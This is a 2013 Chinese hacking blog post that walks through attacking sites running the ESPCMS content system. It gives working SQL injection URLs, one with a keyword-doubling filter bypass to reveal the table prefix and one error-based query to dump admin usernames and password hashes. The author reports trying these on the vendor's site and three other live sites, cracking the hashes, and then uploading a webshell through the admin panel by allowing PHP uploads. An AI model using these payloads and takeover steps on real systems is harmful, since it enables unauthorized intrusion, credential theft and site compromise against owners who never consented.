关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

易思企业系统Espcms注入漏洞+后台拿shell

 feng 2013/03/11 10:52  3,189 ℃  0条点评

作者:阿峰

博客:www.afeng.org

今天下午看到seay发表一篇文章,【Espcms 通杀 SQL注入漏洞分析附EXP+拿下官网】
下载了他的exp,找了几个网站,都没有爆出来,成功率很低,如图
exp.jpg
我就找他调侃了一会,
刚开始他也不知道是怎么回事,后来听他说知道了...不知道他是否更新了...

关于漏洞文件和细节我就不说了,根据他的注入语句我重新修改了一下。

爆前缀:

/index.php?ac=search&at=taglist&tagkey=%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1– by afeng

有图有真相,先来测试一下espcms的官网吧,如图:
01.jpg
看到了吧,前缀是espcms...然后继续爆用户名和密码,无果。就去问了一下seay,他说官网已经修复了,好吧。
我们再来看看其他网站是如何的呢?

爆用户名和密码:

/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

比如官方的前缀是espcms,那么在爆用户名和密码的时候,语句中的前缀二字要修改为espcms。
测试了三个站,成功率还是蛮高的,如图:
02.jpg
-------------------------分割线---------------------------------------------

03.jpg
-------------------------分割线---------------------------------------------
04.jpg
-------------------------分割线---------------------------------------------
我高高兴兴的拿去破解md5,次噢,提示您输入的密文格式不对,我仔细数了数33位,
第一次见,给泼了一盆凉水...我对比了一下这三个MD5,我惊喜发现最后一位都是数字1,
果断删去最后1位,再解,提示收费,好吧,果断购买。

网站的账号和密码,咱都有了,该进行下一步了...

易思ESPCMS默认后台地址:/adminsoft/index.php

后台拿shell很简单,系统设置--图片功能设置--修改上传类型,添加php。

05.jpg

直接上传网马或者一句话,都可以...

提权就不说了...

List of hacking sites
国家互联网应急中心:中国遭境外黑客攻击严重
最新ESPCMS漏洞之cookie注入分析最新ESPCMS漏洞之cookie注入分析Joy:一款用于捕获和分析网络内部流量数据的工具Joy:一款用于捕获和分析网络内部流量数据的工具One-Lin3r:懒人的福音,渗透测试单行化工具One-Lin3r:懒人的福音,渗透测试单行化工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码